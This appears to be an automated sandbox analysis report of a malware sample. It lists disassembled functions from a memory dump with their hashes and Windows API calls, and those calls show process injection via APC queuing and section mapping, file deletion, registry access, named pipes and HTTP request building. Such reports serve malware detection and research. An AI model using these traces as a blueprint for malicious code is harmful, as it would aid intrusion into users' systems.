    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6F2E, Relevance: 19.7, APIs: 13, Instructions: 233 Total matches: 56filesynchronization
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE1CF, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97 Total matches: 57memory
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DBD3F, Relevance: 10.7, APIs: 7, Instructions: 202 Total matches: 131native
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
